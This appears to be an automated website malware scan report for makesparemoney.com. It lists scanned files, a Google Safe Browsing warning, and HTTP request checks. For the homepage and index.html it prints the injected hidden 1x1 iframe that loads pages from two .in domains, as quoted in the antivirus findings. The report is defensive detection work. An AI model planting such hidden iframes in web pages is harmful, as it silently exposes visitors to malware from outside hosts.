Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=makesparemoney.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://makesparemoney.com/ | 200 OK Content-Length: 21997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<iframe src="http://csvert.in/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe>
Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://sluxxqqgykewolmoli.in/in.cgi?default <iframe src="http://sluxxqqgykewolmoli.in/in.cgi?default" width=1 height=1 frameborder=0> | ||
http://makesparemoney.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/Bell_Gothic_Std_500.font.js | 200 OK Content-Length: 44113 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/Bell_Gothic_Std_700.font.js | 200 OK Content-Length: 45520 Content-Type: text/javascript | clean |
http://makesparemoney.com/js/cufon-replace.js | 200 OK Content-Length: 333 Content-Type: text/javascript | clean |
http://makesparemoney.com/index.html | 200 OK Content-Length: 21997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<iframe src="http://csvert.in/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe>
Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://sluxxqqgykewolmoli.in/in.cgi?default <iframe src="http://sluxxqqgykewolmoli.in/in.cgi?default" width=1 height=1 frameborder=0> | ||
http://makesparemoney.com/index-1.html | 200 OK Content-Length: 5434 Content-Type: text/html | clean |
http://makesparemoney.com/index-2.html | 200 OK Content-Length: 5223 Content-Type: text/html | clean |
http://makesparemoney.com/index-3.html | 200 OK Content-Length: 5398 Content-Type: text/html | clean |
http://makesparemoney.com/index-4.html | 200 OK Content-Length: 6423 Content-Type: text/html | clean |
http://makesparemoney.com/index-5.html | 200 OK Content-Length: 6324 Content-Type: text/html | clean |
http://makesparemoney.com/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: makesparemoney.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 16:41:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 21997
Content-Type: text/html
Last-Modified: Mon, 23 Apr 2012 15:10:43 GMT
...21997 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: makesparemoney.com
Referer: http://www.google.com/search?q=makesparemoney.com
Result:
The result is similar to the first query. There are no suspicious redirects found.